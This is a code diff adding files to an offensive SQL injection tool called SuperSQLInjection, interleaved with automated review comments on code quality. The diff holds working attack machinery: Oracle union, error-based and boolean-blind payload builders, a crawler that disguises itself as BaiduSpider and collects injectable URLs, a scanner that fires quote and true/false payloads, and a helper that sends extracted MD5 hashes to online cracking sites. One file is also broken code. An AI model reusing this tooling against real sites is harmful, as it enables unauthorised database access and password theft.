else + { + sb.Append("null,"); + } + } + sb.Remove(sb.Length - 1, 1); + return union_value.Replace("{data}", sb.ToString()); + } + + public static String getUnionDataValue(int columnsLen, int showIndex, List columns, String dbname, String table, String index) + { + StringBuilder sb = new StringBuilder(); + String data = "chr(94)||chr(94)||chr(33)||" + Comm.unionColumns(columns, "||chr(36)||chr(36)||chr(36)||") + "||chr(33)||chr(94)||chr(94)"; + for (int i = 1; i <= columnsLen; i++) + { + if (i == showIndex) + { + sb.Append(data_value.Replace("{data}", data).Replace("{allcolumns}", Comm.unionColumns(columns, ",")).Replace("{dbname}", dbname).Replace("{table}", table).Replace("{index}", 
index)); + sb.Append(","); + } + else + { + sb.Append("null,"); + } + } + sb.Remove(sb.Length - 1, 1); + return union_value.Replace("{data}", sb.ToString()); + } + + public static String getErrorDataValue(String dataPayLoad, String dbname, String table, String index) + { + String data=dataPayLoad.Replace("{dbname}", dbname).Replace("{table}", table).Replace("{index}", index); + return error_value.Replace("{data}", data); + } + + + + public static String getErrorDataLen(List columns, String dbname, String table, String index) + { + return err_hex_len.Replace("{data}", getDataValue(columns, dbname, table, index)); + } + + public static String unionCastColumns(List columns, String unionStr) + { + StringBuilder sb = new StringBuilder(); + foreach (String column in columns) + { + + sb.Append("cast(" + column + " as varchar(4000))" +unionStr); + } + sb.Remove(sb.Length - unionStr.Length, unionStr.Length); + return sb.ToString(); + } + + /// + /// 值的长度 + /// + /// + /// + public static String getBoolLengthPayLoad(String dataStr, int len) + { + + bool_length.Replace("{data}", hex_value.Replace("{data}", dataStr)).Replace("{len}", len.ToString()); + + return dataStr; + } + + /// + /// 获得bool方式值payload + /// + /// 对应值的查询SQL + /// 数据库名 + /// 表名 + /// 下标 + /// + public static String getBoolDataPayLoad(String column,String orderby,String dbName, String table, int index) + { + String data = setDataValue(column, orderby); + String payload = data.Replace("{dbname}", dbName).Replace("{table}", table).Replace("{data}", column).Replace("{index}", index.ToString()); + return payload; + } + + private static String setDataValue(String allColumns, String orderby) + { + return data_value.Replace("{allcolumns}", allColumns); + } + + public static String getDataValue(List columns, String dbName, String table, String index) + { + StringBuilder sb = new StringBuilder(); + String data = Comm.unionColumns(columns, "||chr(36)||chr(36)||chr(36)||"); + sb.Append(data_value.Replace("{data}", 
data).Replace("{allcolumns}", Comm.unionColumns(columns, ",")).Replace("{dbname}", dbName).Replace("{table}", table).Replace("{index}", index)); + sb.Append(","); + sb.Remove(sb.Length - 1, 1); + return sb.ToString(); + } + + } +} diff --git a/SuperSQLInjection/scan/Spider.cs b/SuperSQLInjection/scan/Spider.cs new file mode 100644 index 0000000..72826a7 --- /dev/null +++ b/SuperSQLInjection/scan/Spider.cs 
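Review bot: `setDataValue(String allColumns, String orderby)` in Oracle.cs never uses `orderby`, and the Oracle `data_value` template has no `{orderby}` placeholder, so the argument that `getBoolDataPayLoad` passes is silently dropped. Either remove the parameter or add a comment on `setDataValue` stating that it is ignored. `getDataValue` also appends a comma and removes it on the next line (`sb.Append(","); sb.Remove(sb.Length - 1, 1);`), which is dead code; returning the `Replace` chain directly would be clearer. `unionCastColumns` repeats the unconditional trailing-separator `Remove` from `Comm.unionColumns` and throws on an empty list in the same way.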
@@ -0,0 +1,146 @@ +using System; +using System.Collections.Generic; +using System.Text; +using SuperSQLInjection.model; +using SuperSQLInjection.tools; +using tools; +using model; +using System.Text.RegularExpressions; +using System.Threading; +using System.Collections; + +namespace SuperSQLInjection.scan +{ + class Spider + { + + public List AllURL = new List(); + public List AllNoParamaValURL = new List();//用于去掉相似URL + public static Config config=null; + public static String reqestGetTemplate = "GET {url} HTTP/1.1\r\nUser-Agent: BaiduSpider\r\nAccept-Encoding: gzip, deflate\r\nHost: {host}"; + public static String reqestPOSTTemplate = "POST {url} HTTP/1.1\r\nUser-Agent: BaiduSpider\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 5\r\nHost: {host}\r\n\r\n{data}"; + public void findLinks(String url) + { + try + { + if (url.IndexOf("https") != -1) + { + config.useSSL = true; + } + else { + config.useSSL = false; + } + ServerInfo sever = URLTools.getHostAndPathQueryByURL(url); + Uri uri = new Uri(url); + String crequest = reqestGetTemplate.Replace("{url}", uri.PathAndQuery).Replace("{host}", uri.Host + ":" + uri.Port); + + String rootPath = ""; + if (("http".Equals(uri.Scheme) && uri.Port == 80) || ("https".Equals(uri.Scheme) && uri.Port == 443)) + { + + rootPath = uri.Scheme + "://" + uri.Host; + } + else + { + rootPath = uri.Scheme + "://" + uri.Host + ":" + uri.Port; + } + ServerInfo urlServer = sendHTTP(url.StartsWith("https",StringComparison.OrdinalIgnoreCase),sever.host, sever.port, crequest); + + String rootHost = Tools.getRootDomain(uri.Host); + //当前URL目录 + String cpath = rootPath + Tools.getCurrentPath(uri.AbsolutePath); + int count = 0; + if (urlServer != null) + { + //抓取连接+* + //Thread.Sleep(200); + Match m; + Regex reg = new Regex("href=(['\"\\S]?)(?[^'\"]*)", RegexOptions.IgnoreCase); + if (urlServer.code == 200 && urlServer.body.Length > 10) + { + for (m = reg.Match(urlServer.body); m.Success; m = 
m.NextMatch()) + { + String curl = m.Groups["href"].Value; + if (!String.IsNullOrEmpty(curl)) + { + if (!curl.Contains("?") || !curl.Contains("=")) + { + continue; + } + + if (curl.ToLower().Contains("javascript:")) + { + continue; + } + if (!curl.Contains(".") && !curl.Contains("/")) + { + continue; + } + if (curl.Contains(".css") || curl.Contains(".js") || curl.Contains(".jpg") || curl.Contains(".png") || curl.Contains(".ico") || curl.Contains(".gif")) + { + continue; + } + curl = curl.Replace("&", "&"); + if (curl.StartsWith("//")) + { + + curl = "http:" + curl; + + } + else if (curl.StartsWith("/")) + { + + curl = rootPath + curl; + + } + else if (curl.IndexOf("http://") == -1 && curl.IndexOf("www.") == -1 && curl.IndexOf(".com") == -1 && curl.IndexOf(".cn") == -1 && curl.IndexOf(".tw") == -1 && curl.IndexOf(".jp") == -1) + { + //相对路径 + + curl = cpath + curl; + } + + if (curl.IndexOf(">")!=-1) { + curl = curl.Substring(0, curl.IndexOf(">")); + } + + if (curl.Contains(rootHost)) + { + //过滤相似URL + String noValURL = Tools.clearURLParams(curl); + try + { + Uri cu = new Uri(curl); + if (!AllURL.Contains(curl) && !AllNoParamaValURL.Contains(noValURL)&&AllURL.Count jumpkeyList = FileTool.readFileToList("config/injection/jumpkey.txt"); + //错误注入关键字目录 + public static List errorDBList = FileTool.readAllDic("config/injection/error/"); + //盲注payload + public static List bool_payloads = FileTool.readFileToList("config/injection/injection.txt"); + public static List errer_code = new List(); + + public static void addErrorCode() + { + + errer_code.Add("501"); + errer_code.Add("503"); + errer_code.Add("403"); + errer_code.Add("502"); + errer_code.Add("400"); + errer_code.Add("401"); + errer_code.Add("0"); + } + + public static Injection testInjection(String url, Config config, Boolean justScanError) + { + + Injection injection = new Injection(); + try + { + + int index = url.IndexOf('?'); + if (index == -1) + { + + return injection; + } + injection.url = url; + String testUrl = 
Uri.EscapeUriString(url); + + Uri uri = new Uri(url); + bool isSSL = url.StartsWith("https", StringComparison.OrdinalIgnoreCase); + string queryString = (uri.Query != null && uri.Query.Length > 0) ? uri.Query.Substring(1, uri.Query.Length - 1) : ""; + + String[] strparams = queryString.Split('&'); + int timeout = 0;//超时5次,认为此URL为坏死URL + //对参数进行注入测试 + foreach (String param in strparams) + { + if (timeout >= 5) + { + break;//超时5次,认为此URL为坏死URL + } + if (param.IndexOf("=") == -1) { + continue; + } + String[] sprarm = param.Split('='); + + String pramName = sprarm[0]; + if (jumpkeyList.Contains(pramName)) + { + continue;//忽略扫描参数 + } + if (sprarm.Length <= 1) + { + continue; + } + String pramValue = sprarm[1]; + String payload = param + "%27"; + String curl = uri.PathAndQuery.Replace(param, payload); + injection.testUrl = testUrl.Replace(param, payload); + injection.paramName = sprarm[0]; + String oldrequest = Spider.reqestGetTemplate.Replace("{url}", uri.PathAndQuery).Replace("{host}", uri.Host + ":" + uri.Port); + String request = Spider.reqestGetTemplate.Replace("{url}", curl).Replace("{host}", uri.Host + ":" + uri.Port); + //通过错误显示判断 + + ServerInfo errorDBServer = HTTP.sendRequestRetry(isSSL, config.reTry, uri.Host, uri.Port, payload, request, config.timeOut, HTTP.AutoGetEncoding, config.is_foward_302, config.redirectDoGet); + if (errorDBServer.runTime > config.timeOut * 1000) timeout++; + if (errorDBServer.runTime > config.timeOut) timeout++; + + if (errorDBServer.body.Length == 0 | errorDBServer.code == 404) + { + continue; + } + + foreach (String eop in errorDBList) + { + List errorKeys = FileTool.readFileToList("config/injection/error/" + eop); + foreach (String key in errorKeys) + { + bool find = Regex.IsMatch(errorDBServer.body, key, RegexOptions.IgnoreCase); + if (find) + { + injection.isInjection = true; + injection.dbType = (eop.Replace(".txt", "")); + injection.payload = "'"; + injection.remark = "错误显示信息判断"; + injection.injectType = "错误显示"; + 
injection.dbType = eop; + return injection; + } + } + } + if (!injection.isInjection && justScanError == false) + { + + //读取bool payload + ServerInfo oserver = HTTP.sendRequestRetry(isSSL, config.reTry, uri.Host, uri.Port, "获取原始页面内容", oldrequest, config.timeOut, HTTP.AutoGetEncoding, config.is_foward_302, config.redirectDoGet); + if (oserver.runTime > config.timeOut * 1000) timeout++; + + if (bool_payloads.Count > 0) + { + + foreach (String bool_payload in bool_payloads) + { + String[] bool_ps = bool_payload.Split(':'); + + String flasePayload = pramName + "=" + URLEncode.UrlEncode(pramValue + bool_ps[1]); + String falseURL = uri.PathAndQuery.Replace(param, flasePayload); + injection.paramName = sprarm[0]; + injection.testUrl = testUrl.Replace(param, flasePayload); + + String falserequest = Spider.reqestGetTemplate.Replace("{url}", falseURL).Replace("{host}", uri.Host + ":" + uri.Port); + ServerInfo falseServer = HTTP.sendRequestRetry(isSSL, config.reTry, uri.Host, uri.Port, flasePayload, falserequest, config.timeOut, HTTP.AutoGetEncoding, false, config.redirectDoGet); + if (falseServer.runTime > config.timeOut * 1000) timeout++; + decimal pfalse = Tools.getLike(oserver.body, falseServer.body); + //静态参数 + if (pfalse > 99) + { + continue; + } + + String truePayload = pramName + "=" + URLEncode.UrlEncode(pramValue + bool_ps[0]); + String trueURL = uri.PathAndQuery.Replace(param, truePayload); + String truerequest = Spider.reqestGetTemplate.Replace("{url}", trueURL).Replace("{host}", uri.Host + ":" + uri.Port); + + ServerInfo trueServer = HTTP.sendRequestRetry(isSSL, config.reTry, uri.Host, uri.Port, truePayload, truerequest, config.timeOut, HTTP.AutoGetEncoding, false, config.redirectDoGet); + if (trueServer.runTime > config.timeOut*1000) timeout++; + //计算相似度 + decimal ptrue = Tools.getLike(oserver.body, trueServer.body); + if (ptrue < 85) + { + continue; + } + if (oserver.runTime > config.timeOut) timeout++; + injection.payload = bool_ps[1]; + injection.injectType = 
bool_ps[2]; + injection.dbType = "未知"; + + if (oserver.code != 404 && !errer_code.Contains(oserver.code.ToString()) && !errer_code.Contains(trueServer.code.ToString()) && !errer_code.Contains(falseServer.code.ToString()) && trueServer.body.Length > 0 && falseServer.body.Length > 0) + { + + //判断存在bool盲注 + //根据状态码判断 + if (oserver.code == trueServer.code && trueServer.code != falseServer.code) + { + injection.isInjection = true; + injection.remark = "状态码判断----" + oserver.code + "|" + trueServer.code + "|" + falseServer.code; + return injection; + } + + if (falseServer.body.Length < trueServer.body.Length) + { + /* + if (ptrue > pfalse) + { + + injection.isInjection = true; + injection.remark = "动态响应长度判断,相似度----" + ptrue + "|" + pfalse + "|" + p + "%"; + return injection; + }*/ + + + if (ptrue == 100) + { + + if (ptrue > pfalse) + { + injection.isInjection = true; + injection.remark = "固定长度,相似度--false|true--" + pfalse + "|" + ptrue + "%"; + return injection; + } + } + else { + + ServerInfo true1Server = HTTP.sendRequestRetry(isSSL, config.reTry, uri.Host, uri.Port, truePayload, truerequest.Replace("1%3d1", "2%3d2"), config.timeOut, HTTP.AutoGetEncoding, false, config.redirectDoGet); + if (true1Server.runTime > config.timeOut * 1000) timeout++; + decimal p = Tools.getLike(oserver.body, true1Server.body); + if (ptrue-pfalse>= 2 && Math.Abs(p - pfalse) >= 2) + { + injection.isInjection = true; + injection.remark = "动态长度,相似度--false|true1|true2--" + pfalse + "|" + ptrue + "|" + p + "%"; + return injection; + } + + + } + + + } + + + } + + } + } + + } + + + } + + } + catch (Exception e) + { + Tools.SysLog("判断注入发生异常!" + e.Message); + } + return injection; + } + + } +} \ No newline at end of file diff --git a/SuperSQLInjection/tools/LikeMath.cs b/SuperSQLInjection/tools/LikeMath.cs new file mode 100644 index 0000000..9b8d2d4 --- /dev/null +++ b/SuperSQLInjection/tools/LikeMath.cs 
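Review bot: In `testInjection` the first response is checked against the timeout twice with different scales, `errorDBServer.runTime > config.timeOut * 1000` and then `errorDBServer.runTime > config.timeOut`; if `runTime` is in milliseconds, as the first check suggests, the second one increments `timeout` for nearly every response and the parameter loop stops early at `timeout >= 5`. The same unscaled comparison appears later as `oserver.runTime > config.timeOut`. In the error-match branch `injection.dbType` is set to `eop.Replace(".txt", "")` and then overwritten by `injection.dbType = eop;`, so the reported type keeps the file extension; the second assignment should be dropped. `bool_payload.Split(':')` is indexed at `[1]` and `[2]` without a length check, so one malformed line in `config/injection/injection.txt` ends the scan of the URL through the catch-all, which logs only `e.Message`. The file header for this hunk is not visible in this view.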
@@ -0,0 +1,144 @@ +using System; +using System.Collections.Generic; +using System.Text; + +namespace SuperSQLInjection.tools +{ + public class LikeMath + { + /// + /// 指定按照哪个列排序 + /// + private int ColumnToSort; + /**/ + /// + /// 指定排序的方式 + /// + private SortOrder OrderOfSort; + /**/ + /// + /// 声明CaseInsensitiveComparer类对象, + /// 参见ms-help://MS.VSCC.2003/MS.MSDNQTR.2003FEB.2052/cpref/html/frlrfSystemCollectionsCaseInsensitiveComparerClassTopic.htm + /// + private CaseInsensitiveComparer ObjectCompare; + + /**/ + /// + /// 构造函数 + /// + public ListViewColumnSorter() + { + // 默认按第一列排序 + ColumnToSort = 0; + + // 排序方式为不排序 + OrderOfSort = SortOrder.None; + + // 初始化CaseInsensitiveComparer类对象 + ObjectCompare = new CaseInsensitiveComparer(); + } + + /**/ + /// + /// 重写IComparer接口. + /// + /// 要比较的第一个对象 + /// 要比较的第二个对象 + /// 比较的结果.如果相等返回0,如果x大于y返回1,如果x小于y返回-1 + public int Compare(object x, object y) + { + int compareResult; + ListViewItem listviewX, listviewY; + + // 将比较对象转换为ListViewItem对象 + listviewX = (ListViewItem)x; + listviewY = (ListViewItem)y; + + // 比较 + compareResult = new MyCopare().Compare(listviewX.SubItems[ColumnToSort].Text, listviewY.SubItems[ColumnToSort].Text); + + // 根据上面的比较结果返回正确的比较结果 + if (OrderOfSort == SortOrder.Ascending) + { + // 因为是正序排序,所以直接返回结果 + return compareResult; + } + else if (OrderOfSort == SortOrder.Descending) + { + // 如果是反序排序,所以要取负值再返回 + return (-compareResult); + } + else + { + // 如果相等返回0 + return 0; + } + } + + /**/ + /// + /// 获取或设置按照哪一列排序. + /// + public int SortColumn + { + set + { + ColumnToSort = value; + } + get + { + return ColumnToSort; + } + } + + /**/ + /// + /// 获取或设置排序方式. + /// + public SortOrder Order + { + set + { + OrderOfSort = value; + } + get + { + return OrderOfSort; + } + } + } +} + diff --git a/SuperSQLInjection/tools/MyCopare.cs b/SuperSQLInjection/tools/MyCopare.cs new file mode 100644 index 0000000..98b98ad --- /dev/null +++ b/SuperSQLInjection/tools/MyCopare.cs 
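Review bot: The constructor in this new file is declared as `public ListViewColumnSorter()` while the enclosing type is `class LikeMath`, so the compiler reads it as a method without a return type and rejects the file if it is part of the build (the project file is not visible here). The class also uses `SortOrder`, `ListViewItem` and `CaseInsensitiveComparer` without `using System.Collections;` or `using System.Windows.Forms;`. Its comments describe an IComparer override, yet no interface is declared. I would declare the type as `public class ListViewColumnSorter : IComparer` and add the two usings, or drop the file if it is an unused copy.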
@@ -0,0 +1,33 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+
+namespace SuperSQLInjection.tools
+{
+ class MyCopare : System.Collections.IComparer
+ {
+ public int Compare(object x, object y)
+ {
+ string s1 = (string)x;
+
+ string s2 = (string)y;
+
+ if (s1.Length > s2.Length) return 1;
+
+ if (s1.Length < s2.Length) return -1;
+
+ for (int i = 0; i < s1.Length; i++)
+ {
+
+ if (s1[i] > s2[i]) return 1;
+
+ if (s1[i] < s2[i]) return -1;
+
+ }
+
+ return 0;
+
+ }
+ }
+}
diff --git a/SuperSQLInjection/tools/OnlineMD5.cs b/SuperSQLInjection/tools/OnlineMD5.cs
new file mode 100644
index 0000000..8ea2175
--- /dev/null
+++ b/SuperSQLInjection/tools/OnlineMD5.cs
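Review bot: `Compare` casts both arguments with `(string)x` and `(string)y` and then reads `.Length`, so a null item ends the sort with a NullReferenceException and a non-string item with an InvalidCastException. `StringLengthComparer.Compare` in this commit has the same pattern. A guard such as `string s1 = x as string ?? "";` (and the same for `y`) keeps the comparison total. The ordering is also undocumented; a comment like `// Shorter strings sort first; equal lengths are compared char by char (ordinal).` above the method would help.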
@@ -0,0 +1,77 @@ +using model; +using System; +using System.Collections.Generic; +using System.Net; +using System.Text; +using System.Text.RegularExpressions; + +namespace SuperSQLInjection.tools +{ + class OnlineMD5 + { + + public static String decodeMD5_cmd5(String md5){ + ServerInfo server_index=HTTPRequest.getHtml("http://www.cmd5.com/",null,null); + String VIEWSTATE = Regex.Match(server_index.body, "VIEWSTATE\" value=\"(?\\S+)\"").Groups["result"].Value; + + String data = "__VIEWSTATE=" + VIEWSTATE + "&ctl00%24ContentPlaceHolder1%24TextBoxInput=" + md5 + "&ctl00%24ContentPlaceHolder1%24InputHashType=md5&ctl00%24ContentPlaceHolder1%24Button1=%E8%A7%A3%E5%AF%86"; + ServerInfo server_result = HTTPRequest.getHtmlByPost("http://www.cmd5.com", data, "http://www.cmd5.com/", server_index.cookies); + String result = Regex.Match(server_result.body, "Answer\">(?\\S+)\\S+)\"").Groups["result"].Value; + String sand = Regex.Match(server_index.body, "sand\" value=\"(?\\S+)\"").Groups["result"].Value; + if (token.Length > 1) { + + ServerInfo server_result = HTTPRequest.getHtmlByPost("http://www.md5.com.cn/md5reverse", "md=" + md5 + "&sand=" + sand + "&token=" + token + "&submit=MD5+Crack", "http://www.md5.com.cn/", server_index.cookies); + String result = Regex.Match(server_result.body, "green\">(?\\S+)").Groups["result"].Value; + return result; + } + return "接口异常"; + + } + public static String decodeMD5_xmd5_org(String md5) + { + + ServerInfo server_index = HTTPRequest.getHtml("http://www.xmd5.org", null, null); + + ServerInfo server_result = HTTPRequest.getHtml("http://www.xmd5.org/md5/search.asp?hash="+md5+"&xmd5=MD5+%BD%E2%C3%DC", "http://www.xmd5.org/", server_index.cookies); + String result = Regex.Match(server_result.body, "ff\" size=\"3\">(?\\S+) ").Groups["result"].Value; + return result; + } + + public static String decodeMD5_somd5_com(String md5) + { + + ServerInfo server_result = HTTPRequest.getHtmlByPost("http://www.somd5.com/somd5-index-md5.html", 
"isajax=sJUVsBd1XOzFDPynHEfSnSt&md5=" + md5, "http://www.somd5.com/", null); + String result = Regex.Match(server_result.body, "inline;\">(?\\S+)").Groups["result"].Value; + return result; + } + public static String decodeMD5_md5_cc(String md5) + { + + ServerInfo server_result = HTTPRequest.getHtml("http://www.md5.cc/ShowMD5Info.asp?GetType=ShowInfo&md5_str="+md5, "http://www.md5.cc/", null); + String result = Regex.Match(server_result.body, "px\">(?\\S+)").Groups["result"].Value; + return result; + } + + public static String decodeMD5_pmd5_com(String md5) + { + ServerInfo server_index = HTTPRequest.getHtml("http://pmd5.com/", null, null); + String VIEWSTATE = Regex.Match(server_index.body, "VIEWSTATE\" value=\"(?\\S+)\"").Groups["result"].Value; + String EVENTVALIDATION = Regex.Match(server_index.body, "EVENTVALIDATION\" value=\"(?\\S+)\"").Groups["result"].Value; + + String data = "__VIEWSTATE=" + VIEWSTATE + "&__EVENTVALIDATION=" + EVENTVALIDATION + "&key=" + md5 + "&jiemi=MD5%E8%A7%A3%E5%AF%86"; + ServerInfo server_result = HTTPRequest.getHtmlByPost("http://pmd5.com/?action=getpwd", data, "http://pmd5.com/", server_index.cookies); + String result = Regex.Match(server_result.body, "为“(?\\S+)").Groups["result"].Value; + return result; + + } + } +} diff --git a/SuperSQLInjection/tools/StringLengthComparer.cs b/SuperSQLInjection/tools/StringLengthComparer.cs new file mode 100644 index 0000000..0cbec8c --- /dev/null +++ b/SuperSQLInjection/tools/StringLengthComparer.cs @@ -0,0 +1,24 @@ +using System; +using System.Collections.Generic; +using System.Linq; +using System.Text; + +namespace tools +{ + class StringLengthComparer : System.Collections.IComparer + { + public int Compare(object x, object y) + { + string s1 = (string)x; + + string s2 = (string)y; + + if (s1.Length > s2.Length) return -1; + + if (s1.Length < s2.Length) return 1; + return 0; + + } + + } +} 
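Review bot: Every `decodeMD5_*` method sends the caller's hash to a third-party site over plain `http://`, so the value leaves the machine unencrypted and is disclosed to services outside the operator's control. Nothing in the visible code documents this or makes it optional. I would put a comment on the class such as `// Sends the hash to external lookup services over cleartext HTTP.` and gate the calls behind a configuration switch that is off by default. The `md5` argument is also concatenated into the query string and form body unchecked; `Regex.IsMatch(md5, "^[0-9a-fA-F]{16}$|^[0-9a-fA-F]{32}$")` before the request keeps arbitrary text out of the outbound URL. `server_index.body` and `server_result.body` reach `Regex.Match` without a null check, which presumably throws when a site is unreachable.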
diff --git a/SuperSQLInjection/tools/Tools.cs b/SuperSQLInjection/tools/Tools.cs
new file mode 100644
index 0000000..7720448
--- /dev/null
+++ b/SuperSQLInjection/tools/Tools.cs
@@ -0,0 +1,723 @@ +using System; +using System.Collections.Generic; +using System.Text; +using System.IO; +using System.Net; +using System.Text.RegularExpressions; +using System.Net.Sockets; +using System.Threading; +using tools; +using model; +using System.Globalization; +using System.Security.Cryptography; +using System.Windows.Forms; +using SuperSQLInjection.model; +using SuperSQLInjection; +using SuperSQLInjection.tools; + +namespace tools +{ + class Tools + { + public const String httpLogPath = "logs/http/"; + + public static long currentMillis() + { + return (long)(DateTime.UtcNow - new DateTime(1970, 1, 1, 0, 0, 0, DateTimeKind.Utc)).TotalMilliseconds; + } + public static bool ThreadPoolIsEnd() + { + int workerThreads = 0; + int maxWordThreads = 0; + //int + int compleThreads = 0; + ThreadPool.GetAvailableThreads(out workerThreads, out compleThreads); + ThreadPool.GetMaxThreads(out maxWordThreads, out compleThreads); + + if (maxWordThreads == workerThreads) + { + return true; + } + else { + return false; + } + } + + public static void SysLog(String log) + { + FileTool.AppendLogToFile("logs/" + DateTime.Now.ToLongDateString() + ".log.txt", log + "----" + DateTime.Now); + } + + public static String RandStr(int len) + { + StringBuilder str = new StringBuilder(); + Random rd = new Random(); + for (int i=0;i + /// 二分法取较大整数,用于盲注判断 + /// + /// + /// + /// + public static int getLargeNum(int start,int end){ + + int sum=start+end; + if (sum == 1) { + return 0; + } + if (sum % 2 == 0) + { + return sum / 2; + } + else { + return sum / 2; + } + + } + + + public static String unHexByUnicode(int unicode,String encoding){ + + int c = Tools.UnicodeInt2UTF8Int(unicode); + return Tools.unHex(Convert.ToString(c, 16), encoding); + + } + + public static String hexToRaw(string str,String encoding){ + if (str.Length % 2 == 0) + { + byte[] b = new byte[str.Length / 2]; + int j = 0; + for (int i = 0; i < str.Length; i += 2){ + byte by = Convert.ToByte(str.Substring(i, 2), 
16);//取两个字符,转换成对应的字节 + b[j] = by; + j++; + } + return Encoding.GetEncoding(encoding).GetString(b); + } + else{ + throw new Exception("不能将该字符串转换成String类型!"); + } + } + + public static void sysHTTPLog(String index ,ServerInfo server) + { + FileTool.AppendLogToFile(httpLogPath + index + "-request.txt", server.request); + FileTool.AppendLogToFile(httpLogPath + index + "-response.txt", server.header + "\r\n\r\n" + server.body); + } + + public static void delHTTPLog() + { + try + { + DirectoryInfo din = new DirectoryInfo(httpLogPath); + FileInfo[] files = din.GetFiles(); + foreach (FileInfo f in files) + { + f.Delete(); + } + } + catch (Exception re) + { + Tools.SysLog("删除HTTP日志发生错误!" + re.Message); + } + } + + + /// + /// Hex解码 + /// + /// Hex编码 + /// 字符编码 + /// + public static string unHex(string hex, string charset){ + if (hex == null)throw new ArgumentNullException("hex"); + hex = hex.Replace(",", ""); + hex = hex.Replace("\n", ""); + hex = hex.Replace("\\", ""); + hex = hex.Replace(" ", ""); + if (hex.Length % 2 != 0){ + hex += "20";//空格 + } + // 需要将 hex 转换成 byte 数组。 + byte[] bytes = new byte[hex.Length / 2]; + for (int i = 0; i < bytes.Length; i++){ + try{ + // 每两个字符是一个 byte。 + bytes[i] = byte.Parse(hex.Substring(i * 2, 2), + System.Globalization.NumberStyles.HexNumber); + } catch{ + // Rethrow an exception with custom message. 
+ SysLog("unHex解码错误---hex is not a valid hex number!"); + } + } + Encoding chs = Encoding.GetEncoding(charset); + return chs.GetString(bytes); + } + /// + /// 将数组转换成字符串 + /// + /// + /// + public static String convertToString(String[] strs){ + + StringBuilder sb = new StringBuilder(); + foreach(String s in strs){ + sb.Append(s); + } + return sb.ToString(); + + } + + /// + /// 将字符串转换成数字,错误返回0 + /// + /// 字符串 + /// + public static int convertToInt(String str) + { + + try + { + return int.Parse(str); + } + catch (Exception e) { + Tools.SysLog("info:-"+e.Message); + } + return 0; + + } + /// + /// 将16进制转换成10进制 + /// + /// 16进制字符串 + /// + public static int convertToIntBy16(String str) + { + try + { + return Convert.ToInt32(str,16); + } + catch (Exception e) + { + + } + return 0; + + } + + public static int findKeyCount(String str,String key) + { + int count = 0; + try + { + if (!String.IsNullOrEmpty(str)) + { + int index = 0; + + while (index != -1) + { + index = str.IndexOf(key, index + 1); + if (index != -1) + { + count++; + } + } + } + } + catch (Exception e) + { + Tools.SysLog("findKeyCount发生异常!"+e.Message); + } + return count; + + } + + public static Boolean checkEmpty(String str) { + + if (str != null && str.Length > 0) + { + return false; + } + else { + return true; + } + } + + public static String StringArrayToString(String[] array) + { + StringBuilder sb = new StringBuilder(); + foreach (String s in array) { + + if (s != null) + { + + sb.Append(s); + } + else { + + sb.Append("_"); + } + + } + return sb.ToString(); + } + /// + /// 判断页面注入true或false + /// + /// 服务器响应对象ServerInfo + /// 是否使用状态码判断 + /// 关键字 + /// + public static Boolean isTrue(ServerInfo server,String key,Boolean reverKey,KeyType keyType) + { + switch (keyType) { + case KeyType.Key: + + //用关键字判断 + if (server.body.Length > 0 && server.body.IndexOf(key) != -1) + { + if (reverKey) + { + return false; + } + return true; + } + else + { + if (reverKey) + { + return true; + } + return false; + } + + case 
KeyType.Code: + //用状态码判断 + if (server.code > 0 && key.Equals(server.code + "")) + { + if (reverKey) + { + return false; + } + return true; + } + else + { + if (reverKey) + { + return true; + } + return false; + } + case KeyType.Length: + //用长度判断 + if (key.Equals(server.length.ToString())) + { + if (reverKey) + { + return false; + } + return true; + } + else + { + if (reverKey) + { + return true; + } + return false; + } + + case KeyType.Time: + int time = Tools.convertToInt(key); + if (server.runTime > time*1000) + { + if (reverKey) + { + return false; + } + return true; + } + else + { + if (reverKey) + { + return true; + } + return false; + } + + } + return false; + + } + + public static String strToHex(String str,String encode) + { + try + { + + StringBuilder sb = new StringBuilder();// 存储转换后的编码 + Byte[] strByte=Encoding.GetEncoding(encode).GetBytes(str); + foreach (Byte s in strByte) + { + sb.Append(s.ToString("x").PadLeft(2, '0')); + } + return "0x" + sb.ToString(); + + + } + catch (Exception e) + { + Tools.SysLog("hex转换错误,传递str:" + str + ",encode:" + encode + "!错误消息:" + e.Message); + } + return ""; + } + public static int UnicodeInt2UTF8Int(int UnicodeInt) + { + if (UnicodeInt < 128) + { + return UnicodeInt; + } + int num = UnicodeInt >> 12 & 15; + int num2 = UnicodeInt >> 6 & 63; + int num3 = UnicodeInt & 63; + return (num + 224 << 16) + (num2 + 128 << 8) + (num3 + 128); + } + + public static int UTF8Int2UnicodeInt(int UTF8Int) + { + if (UTF8Int < 128) + { + return UTF8Int; + } + int num = UTF8Int >> 16 & 15; + int num2 = UTF8Int >> 8 & 63; + int num3 = UTF8Int & 63; + return (num << 12) + (num2 << 6) + num3; + } + + public static String randIP() + { + Random rd = new Random(); + + String ip = rd.Next(1, 255) + "." + rd.Next(1, 255) + "." + rd.Next(1, 255) + "." 
+ rd.Next(1, 255); + + return ip; + } + + public static String stringToAscii(String str) + { + char[] cstr = str.ToCharArray(); + StringBuilder sb = new StringBuilder(); + foreach (char c in cstr) { + sb.Append(Convert.ToInt32(c) + " "); + } + if (sb.Length > 1) { + sb.Remove(sb.Length - 1, 1); + } + return sb.ToString(); + } + + public static String asciiToString(String str) + { + try + { + String[] sstr = str.Split(' '); + StringBuilder sb = new StringBuilder(); + foreach (String c in sstr) + { + sb.Append(((char)(int.Parse(c)))); + } + return sb.ToString(); + } + catch (Exception e) { + + Tools.SysLog("waring:asciiToString发生错误,"+e.Message); + + } + return ""; + } + + public static decimal getLike(String body1, String body2) + { + + String[] keys1 = Regex.Split(body1, "[^\\u0080-\\uFFFF\\w\\-\\d]+"); + String[] keys2 = Regex.Split(body2, "[^\\u0080-\\uFFFF\\w\\-\\d]+"); + + HashSet hash1 = new HashSet(); + HashSet hash2 = new HashSet(); + foreach (String key in keys1) + { + if (!hash1.Contains(key)) + { + hash1.Add(key); + } + } + foreach (String key in keys2) + { + if (!hash2.Contains(key)) + { + hash2.Add(key); + } + } + int count = 0; + foreach (String key in hash2) + { + if (hash1.Contains(key)) + { + count++; + } + } + decimal p = 0; + if (hash1.Count > 0) + { + decimal cc = (decimal)((float)count * 100 / hash1.Count); + p = decimal.Round(cc, 2); + } + return p; + } + + public static String findKeyByStr(String trueString, String falseString, String oldString) + { + try + { //以时间判断 + String key = ""; + + String[] Keys = Regex.Split(oldString, "[^\\u0080-\\uFFFF\\w\\d]+"); + Array.Sort(Keys, new StringLengthComparer()); + 